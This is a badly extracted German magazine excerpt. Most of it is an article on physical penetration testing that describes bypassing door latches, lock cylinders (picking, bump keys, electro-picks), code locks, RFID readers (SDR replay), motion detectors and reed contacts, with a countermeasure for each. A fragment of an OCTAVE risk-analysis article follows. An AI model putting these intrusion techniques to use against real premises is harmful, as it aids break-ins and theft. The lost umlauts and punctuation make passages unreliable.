Die RealitaumltIch wurde von einem mittelstaumlndischen Unternehmen engagiert einen Penetrationstest durchzufuumlhren Waumlh-rend der Footprinting-Phase habe ich sehr schnell er-kannt dass die IT-Sicherheit bei diesem Unternehmen ein sehr sensibles Thema ist Doch trotz fast paranoider Sicherheitsvorkehrungen ist es mir erfolgreich gelun-gen dem Unternehmen die Kundendaten zu entwen-den Zwar war IT-Technisch alles abgesichert der phy-sische Zugang zu den Daten war es allerdings nicht Die Eingangstuumlr des Unternehmens war wegen des
Kundenverkehrs nicht abgeschlossen Die Tuumlr zum Serverraum stand wohl wegen der Abwaumlrme sperran-gelweit offen im Schloss des Racks steckte der Schluumls-sel Es gab nichts und niemanden der mich davor ab-halten konnte aus jedem Server jeweils eine Festplatte einzustecken und blitzschnell das Gelaumlnde zu verlas-sen Weder der Geschaumlftsfuumlhrer noch die IT-Adminis-tration hat mit einem so dreisten und einfachen Angriff gerechnet
In dem folgenden Artikel werde ich die aktuelle Si-cherheitstechnik vorstellen und aufzeigen wie ein-fach diese Technik zerstoumlrungsfrei mit und fast spurlos uumlberlistet werden kann Dieser Artikel ist keine Anlei-tung wie man einbricht er soll lediglich die Schwach-stellen der heute massenhaft eingesetzten Systeme aufzeigen Aus diesem Grund habe ich mich bei den Beschreibungen kurz gefasst sowie einige Details weggelassen
Zugefallene TuumlrenWas ist eigentlich eine zugefallene Tuumlr Rund 95 al-ler Tuumlren haben heute ein Schloss mit einer Falle Wird die Tuumlr zugezogen faumlllt die Schlossfalle in die dafuumlr vorgesehene Oumlffnung des Schlieszligbleches in der Tuumlrz-arge Die Tuumlr laumlsst sich dann entweder mit dem Tuumlr-griff oder durch das drehen des Schlieszligzylinders wieder oumlffnen (wenn zB auf einer Seite ein Knauf statt eines Angriffes angebracht ist) Mit dem Schluumlssel reicht ei-ne halbe Umdrehung aus um die Tuumlr wieder zu oumlffnen Bei elektronischen Schlieszligsystemen erfolgt die Freiga-
Penetration Testing im Jahre 2010
Viele Administratoren uumlbersehen leider bei der Absicherung des Netzwerkes seine physikalische Sicherheit Die Bedrohung kommt nicht nur durch das Ethernet-Kabel
IN DIESEM ARTIKEL ERFAHREN SIE
werden koumlnnen
WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
Dimitri Roschkowski
10201018
PRAXIS
Um so etwas zu verhindern bieten sich sogenannte Doppelfalztuumlren an (Abbildung 2) Diese Tuumlren haben einen zweiten Knick im Rahmen und Tuumlrblatt Eine an-gesetzte Oumlffnungsnadel kommt damit nicht mehr an die Schlieszligfalle ran und eine Oumlffnung wird damit verhindert Mit einer sogenannten bdquoMach Aufldquo Faltkarte laumlsst sich aber auch dieses Hindernis uumlberwinden
Damit eine Tuumlr mit diesen Techniken nicht geoumlffnet werden kann hilft es nur diese Tuumlr abzuschlieszligen Dabei wird mindestens ein Riegel in das Schlieszligblech geschoben der ohne Schluumlssel nicht mehr zuruumlckge-schoben werden kann Das Abschlieszligen einer Tuumlr mit Schluumlssel ist jedoch nicht komfortabel Diese Schwauml-che haben die Schlosshersteller erkannt und bie-ten selbstschlieszligende Schloumlsser an Diese Schloumls-ser schieben automatisch beim zufallen die Riegel in das Schlieszligblech Betaumltigt man die Tuumlrklinke wird gleichzeitig die Schlossfalle und die Riegel zuruumlckge-schoben die Tuumlr ist wieder offen Je nach Modell des Schlosses braucht man aber weiterhin eine bis zwei Umdrehungen mit dem Schluumlssel um diese Tuumlr zu oumlff-nen
Diese Schloumlsser sind allerdings nicht fuumlr Tuumlren ge-eignet die uumlber eine Elektronik geoumlffnet werden sol-len Hierfuumlr gibt es allerdings auch eine Loumlsung Es gibt Schloumlsser mit einer Elektronik und einem Elekt-romotor der dann bei einem entsprechenden Signal das Schloss aufschlieszligt und damit die Funktion eines Schluumlssels simuliert Allerdings sind solche Schloumlsser recht teuer
Lockpicking ndash Der Zylinder als AngriffszielEine weitere Schwachstelle einer Tuumlr ist der Zylinder Ein Laie kann nicht erkennen ob die Mechanik eines Zylinders sicher ist oder mit entsprechendem Werkzeug sekundenschnell uumlberlistet werden kann Fuumlr ihn zaumlhlt lediglich der Preis und die Logos auf der Verpackung um die Sicherheit beurteilen zu koumlnnen Hier gilt aller-dings ausnahmsweise der Grundsatz billig = schlechtteuer = gut wobei man dazu anmerken muss dass man die oberste Preiskategorie der Zylinder waumlhlen muss um tatsaumlchlich eine hohe Sicherheitsstufe her-stellen zu koumlnnen Dass man Zylinder oumlffnen kann liegt an der (Massen-)Herstellung dieser mechanischen Ge-raumlte Jedes Produkt weist gewisse Toleranzen auf je groumlszliger diese Toleranzen sind desto leichter laumlsst sich der Zylinder uumlberlisten
Wie Funktioniert ein SchlieszligzylinderEin Schlieszligzylinder besteht aus einem Gehaumluse (hell-grau) und einem Kern (dunkelgrau) Kernstifte (gelb) und Gehaumlusestifte (rot) verhindern dass der Kern ge-dreht werden kann Fuumlhrt man nun einen Schluumlssel in den Schlieszligkanal (weiszlig) ein druumlcken die Zaumlhne des Schluumlssels die Kernstifte herunter sodass der Uumlber-gang zwischen den Kernstiften und den Gehaumlusestif-
be dabei nicht an der Schlossfalle freigegeben sondern am Schlieszligblech
Wie laumlsst sich eine zugefallene Tuumlr oumlffnen Zugefallene Tuumlren lassen sich ganz einfach oumlffnen Schluumls-seldienste verwenden hierfuumlr Oumlffnungsnadeln (Abbildung 1) Diese Oumlffnungsnadeln werden in Houmlhe der Schlossfalle zwischen Tuumlrzarge und Tuumlrblatt angesetzt zieht man jetzt den hinteren Teil der Oumlffnungsnadel nach oben druumlckt der vordere Teil die Schlieszligfalle wieder ins Schloss zuruumlck ndash die Tuumlr ist damit offen Mit etwas Uumlbung dauert es nicht laumlnger als fuumlnf Sekunden um eine Tuumlr zu oumlffnen
Abbildung 2 Eine Oumlffnungsnadel an einer Doppelfalztuumlr
Abbildung 1 Zwei Saumltze Oumlffnungsnadeln
Penetration Testing im Jahre 2010
hakin9orgde 19
ten genau zwischen dem Kern und dem Gehaumluse ist In diesem Zustand laumlsst sich der Kern drehen und ein Schloss aufschlieszligen
Ich moumlchte hier drei Methoden vorstellen mit denen ein Schlieszligzylinder ohne Schluumlssel zerstoumlrungsfrei ge-oumlffnet werden kann Beim klassischen Handpicken geht es darum die Sperrstifte eines Schlosses so zu mani-pulieren dass diese den Kern freigeben Zunaumlchst wird ein Spanner in den Schlieszligkanal eingefuumlhrt und um ein paar Grad gedreht sodass ein minimaler Drehmoment auf die Sperrstifte wirkt Geht man jetzt mit einem Hand-pick die einzelnen Sperrstifte ab so laumlsst sich mit etwas Uumlbung erfuumlhlen welcher Stift gerade am meisten Wi-derstand bietet Druumlckt man diesen Stift mit dem Hand-pick herunter laumlsst sich der Kern ein kleines bisschen drehen sobald der der Gehaumlusestift den Kern verlas-sen hat Diesen Stift hat man jetzt gesetzt Nun sperrt ein anderer Sperrstift In einem normalen Schloss gibt es etwa fuumlnf solcher Stifte Hat man alle Stifte richtig gesetzt laumlsst sich der Kern drehen ist der Zylinder ist damit geoumlffnet
Eine weitere Methode um einen Schlieszligzylinder zu oumlffnen sind Schlagschluumlssel Ein Schlagschluumlssel ist ein spezieller aus Stahl gefertigter Schluumlssel der nur im Profil in einen Zylinder passt Die Zaumlhne des Schluumlssels wurden auf die tiefst moumlgliche Position gefraumlst auszliger-dem wurde der Anschlag des Schluumlssels um etwa ei-nen Millimeter verkuumlrzt sodass der Schluumlssel sich mit leichtem Druck etwas tiefer ins Schloss einfuumlhren laumlsst als vorgesehen Zum Oumlffnen des Zylinders fuumlhrt man den Schlagschluumlssel in den Zylinder ein und schlaumlgt an-schlieszligend mit einem flexiblen Hammer auf den Schluumls-sel Den Schlagimpuls uumlbertragen die Kernstifte auf die Gehaumlusestifte die dann nach unten gedraumlngt werden und damit den Kern freigeben Dreht man den Schlag-schluumlssel genau in diesem Moment (wenige Millisekun-den nach dem Schlag) laumlsst sich der Kern drehen und das Schloss oumlffnen
Die dritte Methode ist ein Elektro-Pick Ein Elek-tropick arbeitet nach dem gleichen Prinzip wie ein Schlagschluumlssel nur dass hier mehrere Schlaumlge pro Sekunde auf die Sperrstifte erfolgen Um einen Zylin-der mit dieser Methode zu oumlffnen fuumlhrt man die Na-del des Elektro-Picks sowie einen Spanner (entwe-der einen normalen oder einen Drehspanner) in den Schlieszligkanal ein und schaltet den Pick ein Anstatt den Pick durchgehend laufen zu lassen empfiehlt es sich ihn in kurzen Sequenzen ein- und auszuschalten Sind die Sperrstifte in passender Position laumlsst sich der Kern drehen
Bei allen drei vorgestellten Oumlffnungsmethoden hat man bei abgeschlossenen Schloumlssern immer ein Pro-blem Hat man einen Zylinder um 360deg gedreht druuml-cken die Federn die Gehaumlusestifte wieder in den Kern und man muumlsste den Zylinder erneut oumlffnen (picken) Um das zu verhindern ndash und damit stelle ich das letz-
te Werkzeug meiner Sammlung vor ndash benutzt man das bdquoFlip-Itldquo Werkzeug Dieses Werkzeug nutzt die physika-lische Traumlgheit aus indem der Zylinder so schnell dreht wird dass die Federn es nicht schaffen die Stifte in den Kern zu druumlcken Dazu spannt man den bdquoFlip-Itldquo erst einmal in der Richtung vor in der der Zylinder gedreht werden soll dann fuumlhrt man es in den Schlieszligkanal ein und druumlckt den Ausloumlser Der Zylinder wird dann uumlber die oberste Position gedreht und man kann das Schloss weiter oumlffnen
Man benoumltigt viel Uumlbung um einen Zylinder ohne Schluumlssel oumlffnen zu koumlnnen Denn macht man es mit Gewalt kann die Mechanik im inneren beschaumldigt wer-den Dann laumlsst sich das Schloss nicht einmal mit dem richtigen Schluumlssel oumlffnen
Sichere SchlieszligzylinderSichere Schlieszligzylinder gibt es in meinen Augen nicht Je nachdem welchen Aufwand und Kosten man auf sich nimmt wird man in der Lage sein alle Zylinder zu um-gehen Einen aus meiner Sicht relativ sicheren Zylin-der bietet die Firma EVVA mit dem MCS (Magnet Code System) an Statt normaler Stifte arbeitet dieser Zylin-der mit insgesamt acht Magnetrotoren Wird ein Schluumls-
Abbildung 4 Werkzeugsatz zur zerstoumlrungsfreien Oumlffnung von Schloumlssern
Abbildung 3 Ein Schlieszligzylinder im Querschnitt Links ist der Zylinder abgeschlossen rechts offen (Bildquelle Wikipediade)
10201020
PRAXIS
sel mit richtiger Magnet-Codierung eingefuumlhrt werden die Rotoren in die Schlieszligposition gebracht und der Zylinder laumlsst sich drehen Zusaumltzlich kann ein solcher Zylinder mit einer Elektronik auf RFID Basis ausgestat-tet werden Zusaumltzlich zum Magnetcode wird noch ei-ne elektronische Authentifizierung durchgefuumlhrt bevor dieser Zylinder trotz des richtigen Schluumlssels gedreht werden kann So koumlnnen zB verlorene Schluumlssel ge-sperrt werden oder um Mitarbeitern den Zutritt nur zu bestimmten Zeiten zu gestatten
CodeschloumlsserCodeschloumlsser sind in der Regel zugefallene Tuumlren und lassen sich am einfachsten mit den bereits oben vor-gestellten Methoden oumlffnen In diesem Artikel moumlchte ich aber auf eine weitere Schwachstelle hinweisen Die Abbildung 5 zeigt ein typisches Codeschloss anhand des Zylinders auf der rechten Seite kann jeder darauf schlieszligen wie groszlig die Code-Tasten dieses Schlosses in der Realitaumlt sind Wuumlrde man eine Codeeingabe fil-men koumlnnte man anhand der langen Handbewegun-gen auf den Code schlieszligen koumlnnen
Diese Schwachstelle laumlsst sich aber ganz einfach schlieszligen indem man den Eingabetasten die Ziffern fuumlr jede Codeeingabe per Zufallsgenerator zuweist Das bedeutet dass die obere linke Taste nicht permanent die Ziffer 1 eingibt sondern bei jeder Codeeingabe ei-ne andere Durch diese zufaumlllige Anordnung der Zif-fern auf den Tasten laumlsst sich nicht mehr anhand der Handbewegung feststellen welche Ziffer eingegeben wurde Umsaumltzen laumlsst sich eine solche Eingabetech-nik mit Siebensegmentanzeigen oder mini-OLED-Bild-schirmen unter durchsichtigen Tasten bzw mit einem Touchscreen
In Indoor-Bereich trifft man vor einigen Raumlumen auf eine einfachere Version von Codeschloumlssern Bei die-sen Schloumlssern liegt das Eingabeterminal direkt am Schloss an die Energieversorgung erfolgt uumlber Bat-terien Im geschlossenen Zustand laumlsst sich die Tuumlr-klinke ohne Funktion herunterdruumlcken Gibt man den richtigen Code ein wird ein Elektromagnet mit Strom versorgt und Zieht einen Stift an der die Tuumlrklinke mit dem Schloss verbunden Betaumltigt man jetzt die Tuumlrklin-ke so laumlsst sich die Tuumlr oumlffnen Da die Batterien in ei-nem solchen Schloss moumlglichst lange halten sollen arbeiten die Schloumlsser mit einem recht geringen Ma-gnetfeld Dieses Magnetfeld kann man jedoch mit ei-nem von auszligen angebrachten starken Magneten (sie-he auch Abschnitt uumlber Reed-Relais) simulieren und so das Schloss oumlffnen Im Uumlbrigen lassen sich mit einem starken Magneten auch einige aumlltere elektronische Zy-linder oumlffnen
Schlieszligsysteme mit RFID-TagsRFID steht fuumlr radio frequency identification also fuumlr die Identifikation uumlber Funkwellen Diese Technik
Abbildung 6 Ein Elektronisches Codeschloss an einer Gegensprechanlage
Abbildung 5 Ein EVVA-MCS Schluumlssel
Penetration Testing im Jahre 2010
hakin9orgde 21
ist heute sowohl bei Unternehmen als auch in Pri-vathaumlusern (Autoschluumlssel Funk-Garagentoroumlffner) sehr verbreitet und wegen des Komforts beliebt Im Wesentlichen besteht das System aus zwei Kompo-nenten einem RFID Lesegeraumlt und den sogenannten Tags Mit den Tags koumlnnen sich die Zugangsberech-tigten Personen am Lesegeraumlt identifizieren Unab-haumlngig davon ob das Tag aktiv (mit einer eigenen Energieversorgung) oder passiv (die notwendige Energie liefert das Lesegeraumlt) ist wird der Identifi-kationsvorgang vom Tag eingeleitet In den einfach-sten Faumlllen sendet das Tag unverschluumlsselt die eige-ne Seriennummer oder einen vorher eingespeicher-ten Code das Lesegeraumlt empfaumlngt den Code und uumlberpruumlft ob die Seriennummer oder der Code zu-gangsberechtigt ist In den wenigsten Faumlllen erfolgt eine zusaumltzliche Kryptographische Authentifizierung des Tags die aber wegen der geringen Rechenka-pazitaumlt und Energieversorgung sehr einfach ausfaumlllt
Wie kann man solche Systeme uumlberlisten Das Zauberwort dazu lautet bdquoSoftware Defined Ra-dioldquo (SDR) Mit einem SDR Tranceiver ist man in der Lage die Kommunikation zwischen dem Tag und dem Lesegeraumlt aufzuzeichnen und auf einem Rech-ner zu analysieren Anschlieszligend sendet man die aufgezeichneten und eventuell bearbeiteten Daten an das Lesegeraumlt
Wie laumluft ein solcher Angriff ab Zunaumlchst einmal muss man herausfinden auf wel-cher Frequenz die Kommunikation zwischen dem Le-segeraumlt und den Tags erfolgt Dazu kann man uumlber den Herstellernamen des Lesegeraumltes und seinem Produkt-Portfolio gehen oder einfach verschiedene Tags ausprobieren Wenn ein Tag mit dem einge-setzten Lesegeraumlt nicht kompatibel ist erfolgt keine Reaktion Wird dem Tag der Zugang verweigert so zeigt das Lesegeraumlt dies in der Regel an Dann wird ein SRD Tranceiver benoumltigt der auf der benoumltigten Frequenz arbeitet Dazu verwende ich den USRPUSRP2 Tranceiver mit einem passenden Daughter-board und einer Richtantenne (700$1400$ + 275$ + 100$) Der Vorteil dieses Universalsystems liegt daran dass man mit verschiedenen Daughterboard unterschiedliche Frequenzen abdecken kann Die Richtantenne richtet man dann etwas seitlich auf das Lesegeraumlt aus und faumlngt mit der Aufzeichnung der Daten in dem Frequenzbereich an Bei Long Range Tags (das Tag kann mehrere Meter vom Lesegeraumlt entfernt sein) reicht bei Unverschluumlsselten Systemen - wegen der houmlheren Sendestaumlrke - die Aufzeichnung einer Kommunikation aus Passive Tags wie RFID Karten senden ein viel schwaumlcheres Signal deshalb sind die Aufzeichnungen oft gestoumlrt In der Regel be-noumltigt man fuumlnf bis zehn Aufzeichnungen um ein Mus-
Abbildung 8 Eine Uumlberwachungskamera hat eine Veraumlnderung im Bild detektiert Der veraumlnderte Bildausschnitt wird in einem Rahmen angezeigt
Abbildung 7 Das Lesegeraumlt reagiert auf eine Mifare-Classic Karte und lehnt den Zugang ab
10201022
PRAXIS
ter zu finden Der Anfang der Uumlbertragung ist immer gleich in der Mitte gibt es einen variablen Bereich und das Ende ist bei allen Aufzeichnungen ebenfalls gleich Damit ein Lesegeraumlt nun dem virtuellen Tag den Zugang gewaumlhrt saumlubert man zunaumlchst einmal die Aufzeichnungen mit einigen Filtern GNU-Radio bietet hierfuumlr zahlreiche Moumlglichkeiten Dann stellt man sich aus mehreren Aufzeichnungen ca drei moumlglichst ideale (hier braucht man etwas Erfahrung ein gutes Auge und etwas Fingerspitzengefuumlhl) Kom-munikationen zusammen und sendet diese an das Lesegeraumlt Mindestens eine dieser Aufzeichnungen wird dann das Lesegeraumlt akzeptieren und dem An-greifer den Zugang gewaumlhren
Aus der Praxis kann ich sagen dass etwa 90 al-ler RFID-Karten-Systeme sich nur mit der Serien-nummer des Tags zufrieden geben Aumlltere Garagen-toroumlffner arbeiten mit einem statischen Code Neuere Garagentoroumlffner und einige Autohersteller nutzen ei-nen Rolling Code um den Nutzer zu identifizieren Im Maumlrz 2008 wurde auch dieses System von Forschern der Ruhr-Universitaumlt Bochum geknackt Zwei aufge-zeichnete Kommunikationen genuumlgen bereits fuumlr ei-ne Seitenkanalattacke Ebenfalls wurde im Jahr 2008 die Verschluumlsselung des Mifare-Systems per Rever-se Engineering geknackt Solche Verschluumlsslungen verlangsamen nur den Angriff und machen ihn teurer
Gibt es auch sichere RFID-Systeme Die gibt es durchaus Hier verwendet man eine asymmetrische Verschluumlsselung Fuumlr jedes zugangs-
berechtigte Tag wird ein privater und ein oumlffentlicher Schluumlssel erzeugt Der private Schluumlssel wird in einer Datenbank gespeichert auf die das Lesegeraumlt zu-greifen kann Der oumlffentliche Schluumlssel wird auf dem Tag gespeichert Die Identifizierung erfolgt dann in mehreren Schritten Wie oben bereits beschrieben faumlngt das Tag mit der Identifikation an indem es dem Lesegeraumlt seine Seriennummer mitteilt Das Lesege-raumlt generiert daraufhin eine Zufallszahl und sendet diese mit der Seriennummer des Tags wieder zuruumlck (Da die Kommunikation uumlber Funk erfolgt kann es sein dass zur gleichen Zeit mehrere RFID Tags aktiv sind Deshalb muss man waumlhrend der Kommunikati-on stets angeben fuumlr welchen Empfaumlnger eine Nach-richt bestimmt ist) Das Tag empfaumlngt die Nachricht verschluumlsselt diese mit dem oumlffentlichen Schluumlssel und sendet sie an das Lesegeraumlt zuruumlck Kann das Lesegeraumlt die empfangene Nachricht mit dem priva-ten Schluumlssel des Tags entschluumlsseln und stimmt die Nachricht mit der Zufallszahl uumlberein wird der Zu-gang gewaumlhrt
BewegungsmelderBewegungsmelder verwenden fuumlr die Bewegungsde-tektion Passiv Infrarot Sensoren (PIR) Jedes Objekt emittiert eine Waumlrmestrahlung ein PIR Sensor kann diese Strahlung messen Um Bewegungen detektieren zu koumlnnen wird der Sensor mit Buumlndellinsen in Be-reiche aufgeteilt Aumlndert sich die einfallende Strahlung in einem Bereich um einen bestimmten Schwellwert wird dies als Bewegung interpretiert Der Schwellwert sorgt auszligerdem dafuumlr dass statische Temperaturver-aumlnderungen der Umgebung nicht als Bewegung ge-deutet werden Diese Funktionsweise ist leider Fehler-anfaumlllig so kann zB ein kalter Luftstrom bereits einen Bewegungsmelder ausloumlsen Hierfuumlr setzen bessere Bewegungsmelder (Dualmelder) zusaumltzlich noch ei-nen Ultraschall-Sensor ein Nur wenn beide Sensoren ausloumlsen wird eine Bewegung gemeldet Damit sol-len Fehlalarme verhindert werden VdS-Anerkannte Bewegungsmelder die in Alarmanlagen verwendet werden loumlsen zusaumltzlich Alarm aus wenn diese ab-gedeckt werden
Wie kann man Bewegungsmelder uumlberlisten Je groumlszliger die Entfernung zu dem PIR Sensor ist des-to weniger nimmt eine Veraumlnderung Einfluss auf die einfallende Infrarotstrahlung in einem Bereich Auch haben Gegenstaumlnde mit gleicher Waumlrmestrahlung kei-nen Einfluss auf die Sensoren Einen Bewegungsmel-der (auch einen Dualmelder) kann man deshalb mit ei-nem Tuch uumlberlisten Zunaumlchst laumlsst man das Tuch im uumlberwachten Raum einige Minuten liegen damit es die Temperatur der Umgebung annimmt Wenn man sich jetzt in dieses Tuch einhuumlllt und seitwaumlrts mit dem Ruuml-cken zum Bewegungsmelder langsam an diesem vor-
Abbildung 9 Eine Buumlroklammer ist an einer Schnurr befestigt Selbst bei einem Abstand von 35cm ist das Magnetfeld noch so stark dass die Buumlroklammer in der Luft haumlngt
Magnete sind kein Spielzeug
Penetration Testing im Jahre 2010
hakin9orgde 23
beigeht wird keine Bewegung angezeigt Zwar merkt bei einem Dualmelder der Ultraschall-Sensor die Be-wegung da jedoch der Infrarot Sensor keine Bewe-gung meldet findet keine Alarmierung statt Wuumlrde man dieses Tuch etwa 30cm vor dem Bewegungsmel-der aufspannen wuumlrde man den Bewegungsmelder auszliger Funktion setzen Auch eine Abdeckerkennung wuumlrde hier nicht ausloumlsen da diese in der Regel bis 20cm funktioniert
Gibt es AlternativenSicherlich gibt es sie Zunaumlchst einmal gibt es Bewe-gungsmelder die auf Basis von Radarstrahlung funk-tionieren Diese aktiven Bewegungsmelder koumlnnen verdeckt zB unter einer Tapete oder Abdeckplatte in-stalliert werden Dadurch ist ein solcher Bewegungs-meder sowohl optisch nicht wahrnehmbar als auch vor Sabotage und Vandalismus geschuumltzt Ein solcher Bewegungsmelder arbeitet nach dem Dopplerprinzip und strahlt im 9GHz oder 24GHz-Mikrowellenbereich Zwar halten sich die Hersteller solcher Geraumlte an die gesetzlichen Bestimmungen ich wuumlrde allerdings im-mer auf eine zusaumltzliche Strahlenquelle verzichten wo es geht
Eine weitere Alternative zu Bewegungsmeldern sind Kameras Zwar halte ich persoumlnlich nichts von Uumlber-wachung und staumlndiger Videoaufzeichnung doch Kameras sind sehr gute Bewegungsmelder Im Ge-gensatz zu den klassischen PIR Ultraschall oder Ra-darbewegungsmeldern gibt es bei Kameras zahlrei-che Bildpunkte die ausgewertet werden koumlnnen Mit entsprechender Software kann man detektierte Bewe-gungen analysieren und zB mit einer Objekterken-nung interpretieren Verdaumlchtige Bilder lassen sich an ein Sicherheitsunternehmen in Echtzeit uumlbertragen wo ein Mensch beurteilt ob ein Alarm ausgeloumlst wer-den muss oder nicht
Reed-RelaisReed-Relais werden heute verwendet um zB Tuumlr- oder Fensteroumlffnungen zu detektieren Ein Reed-Re-lais besteht einem Reed-Kontakt und einem Magne-ten Der Reed-Kontakt wird am Rahmen befestigt und ist an die Einbruchmeldezentrale angeschlossen Der
Magnet wird auf dem beweglichen Element in Houmlhe des Kontaktes befestigt Wirkt ein Magnetfeld auf den Reed-Kontakt ziehen sich die Schaltkontakte gegen-seitig an und ein Stromkreis wird geschlossen Laumlsst das Magnetfeld nach wenn zB eine Tuumlr geoumlffnet wird und sich der Magnet dem Reed-Kontakt entfernt wird der Stromkreis geoumlffnet In diesem Fall wird dann der Alarm ausgeloumlst
Wie lassen sich Reed-Relais uumlberlisten Das ist vergleichbar einfach Die Antwort auf diese Fra-ge lautet natuumlrlich mit einem Magnetfeld Hierfuumlr eig-nen sich sogenannte bdquoTodesmagnetenldquo (Abbildung 9) Diese Permanentmagneten haben ein extrem starkes Magnetfeld Unter Laborbedingungen hat ein Reed-Kontant bereits bei einer Entfernung von 40cm zum Magneten seine Schaltkontakte geschlossen Holz- Plastik- oder sogar Metall-Tuumlren (sogar 2mm Stahl) bieten keine ausreichende Daumlmpfung fuumlr das Magnet-feld
Eine bessere Alternative zu Reed-Relais sind Licht- oder Laserschranken Diese Schranken bringt man so an dass die Tuumlr den Strahl beim oumlffnen unterbrechen muss
Ziele eines solchen AngriffesEs sind viele Angriffsziele denkbar Es kommt immer auf das Unternehmen an dass angegriffen wird Vor einigen Monaten berichtete die Presse uumlber einen sol-chen Angriff auf einen Baumarkt Kriminelle Einbre-cher haben hier statt waren zu stehlen die Elektronik der Karten-Terminals an den Kassen sabotiert sodass diese die eingelesenen Daten von EC- und Kreditkar-ten samt der vom Kunden eingegebenen PIN per Funk uumlbermittelt wurden Auf dem Parkplatz des Baumark-tes stand dann der Angreifer und hat die Daten emp-fangen
Ein anderes Angriffsziel koumlnnte der Anschluss eines Mini-Computers am Netzwerk sein der ein Loch durch die Firewall bohrt und dem Angreifer einen permanen-ten Zugriff auf das Netzwerk uumlber das Internet gestat-tet Auch ist die Installation eines Hardware-Keylogers denkbar um die Zugangsdaten eines Mitarbeiters aus-zuspionieren
DIMITRI ROSCHKOWSKIDer Autor arbeitet bereits seit vielen Jahren als selbststaumlndi-ger IT-Sicherheitsexperte und Consultant Er fuumlhrt auszligerdem bei Unternehmen Penetration Tests durchKontakt mit dem Autor dimitriroschkowskibiz
Im InternethttpdewikipediaorgwikiLockpicking ndash Wikipedia Ein-trag zum Thema LockpickinghttpwwwevvadezylindernhttpdewikipediaorgwikiReed-Relais ndash Wikipedia Ein-trag zum Reed-Relaishttpwwwelvde ndash Artikel-Nr 68-835-10 ndash Radar Bewe-gungsmelderhttpwwwettuscom
Die IT-Security Community Xchange ist DIE Weiterbildungsnacht fuumlr SystemadministratorInnen Lehrbeauftragte StudentInnen Schuumller-Innen ExpertInnen und Geeks
Themen BiometriePenetration TestingHackz und Crackz Privacy Forensische Analyse Intrusion Prevention Malwarededection Rootkits und deren Erkennung
Freitag 12 November 2010 17 ndash 24 UhrFachhochschule St PoumlltenMatthias Corvinus-Straszlige 15 3100 St PoumlltenT +432742313 228 E officefhstpacatI wwwfhstpacat
Jetzt noch schnell
anmelden unter
httpitsecxfhstpacat
Die Teilnahme ist kostenlos
12-11-2010
OCTAVE
hakin9orgde 25
Um dies zielorientiert und auf die vorhandenen Business Needs maszligzuschneidern sind Risiko-erkennung (Risikoanalyse) und deren anschlie-
szligende Bewertung (Business Impact Analyse) die ersten Schritte die gemacht werden muumlssen
Eine effektive Informations-Sicherheitsbewertung be-trachtet nicht nur den technologischen sondern auch den dahinter liegenden organisatorischen Aspekt Bei-spielsweise die Handhabung der IT-Infrastruktur durch die MitarbeiterInnen bei ihrer taumlglichen Arbeit Durch ei-
ne Risikoanalyse erhaumllt man einen organisationsweiten Uumlberblick uumlber vorhandene Risiken und ist somit integ-raler Bestandteil des Risikomanagements (vergl Abb 1)
OCTAVE ist eine risikobasierende strategische Si-cherheitsbewertungs und -planungstechnik
OCTAVEreg ist ein Kunstwort und setzt sich aus den Begriffen Operationally Critical Threat Asset and Vul-nerability Evaluation zusammen Sie wurde von der Carnegie Mellon University welche auch die populaumlre
OCTAVE ndashHier macht das Risiko die MusikDie uumlberwiegende Mehrheit von Unternehmen sind nach regulativen Vorgaben wie zB Basel II Solvency II SOX 8 EU Auditrichtlinie oder SAS 70 angehalten ein nachhaltiges und nachvollziehbares Risikomanagement und Business Continuity Planning zu implementieren
IN DIESEM ARTIKEL ERFAHREN SIE
ren
WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
men und Standards
Helmut Kaufmann
Abbildung 2 CIAAbbildung 1 Risikomanagementzyklus
10201026
ABWEHR
heitspraxis und Technologie ins Gleichgewicht zu setz-ten Getrieben von zwei Grundaspekten ndash operationel-les Risiko und aktuell eingesetzte Sicherheitspraktiken wird die dahinter liegende Technologie in Zusammen-hang mit der Sicherheitspraxis gegen die drei Eckpfeiler der Sicherheit gepruumlft (vergl Abb 2)
OCTAVE ist ein wertegetriebener Bewertungsansatz Das Analysis Team
die Organisation wichtig sind
diejenigen Werte die als besonders kritisch beur-teilt werden Beruumlcksichtigt die Zusammenhaumlnge zwischen den kritischen Assets den Bedrohungen und den Verwundbarkeiten
menhang
(organisatorisch und auch einen Plan zur Reduzie-rung der Risiken auf kritische Infrastrukturen)
Daraus resultiert ein dreiphasiges Vorgehensmo-dell fuumlr die Erhebung des gesamtorganisatorischen Schutzbeduumlrfnisses (vergl Abb 3)
Aufbau von Asset-basierenden Bedro-
ndash Das Analyse Team stellt informati-
Web-Site wwwcertorg betreibt passend fuumlr die unter-schiedlichsten Unternehmensgroumlszligen als lizenzfreie Risikoanalyse Methode entwickelt
OCTAVE ist eine selbstgesteuerte Methode Das be-deutet dass die MitarbeiterInnen einer Organisation eine wesentliche Rolle bei der Erstellung der Sicher-heitsstrategie uumlbernehmen Risiken von hoch kritisch erkannten Assets werden dazu verwendet um eine entsprechende Priorisierung der Sicherheitsbereiche durchzufuumlhren
Im Gegensatz zu typischen technologielastigen Be-wertungsmethoden die technologische Risiken und taktische Sachverhalte in den Mittelpunkt der Betrach-tung stellen ist OCTAVE auf organisatorische Risiken und deren dazu notwendigen Technologieeinsatz aus-gerichtet Sie ist eine aumluszligerst flexible Methode die fuumlr fast alle Organisationen speziell angepasst werden kann Aus der Sichtweise des Autors ist einer der be-merkenswertesten Vorteile jedoch dass die Methode von den MitarbeiterInnen selbst schnell erlernt und kon-tinuierlich durchgefuumlhrt werden kann und somit nach-haltig in den Risikomanagementprozess ohne weitere Kosten integrierbar ist
Ein ausgewaumlhltes kleines Team aus allen operatio-nellen Bereichen der Organisation inklusive der IT Ab-teilung arbeiten zusammen um die Sicherheitsbeduumlrf-nisse der Organisation zu identifizieren und versuchen die Gebiete Operationelles Risiko eingesetzte Sicher-
Abbildung 3 Octave Phasen
OCTAVE
hakin9orgde 27
onsbezogene Assets und deren Impact auf die Or-ganisation sowie deren derzeitige Schutzmechanis-men fest Darauf aufbauend werden die kritischsten
dafuumlr bestimmt Anschlieszligend wird fuumlr jedes kri-
Erkennen von Verwundbarkeiten der Infra-
struktur ndash Hier wird die hinter den kritischen Assets liegende Infrastruktur bewertet Dabei werden kriti-sche Infrastrukturpfade und informationstechnolo-gische Komponentenklassen aufgestellt und einer technischen Uumlberpruumlfung ndash dem Penetration Test ndash
tung direkt ein
ndash In dieser Phase ent-scheidet das Analyse-Team wie mit den kritischen Assets umgegangen werden soll Basierend auf die
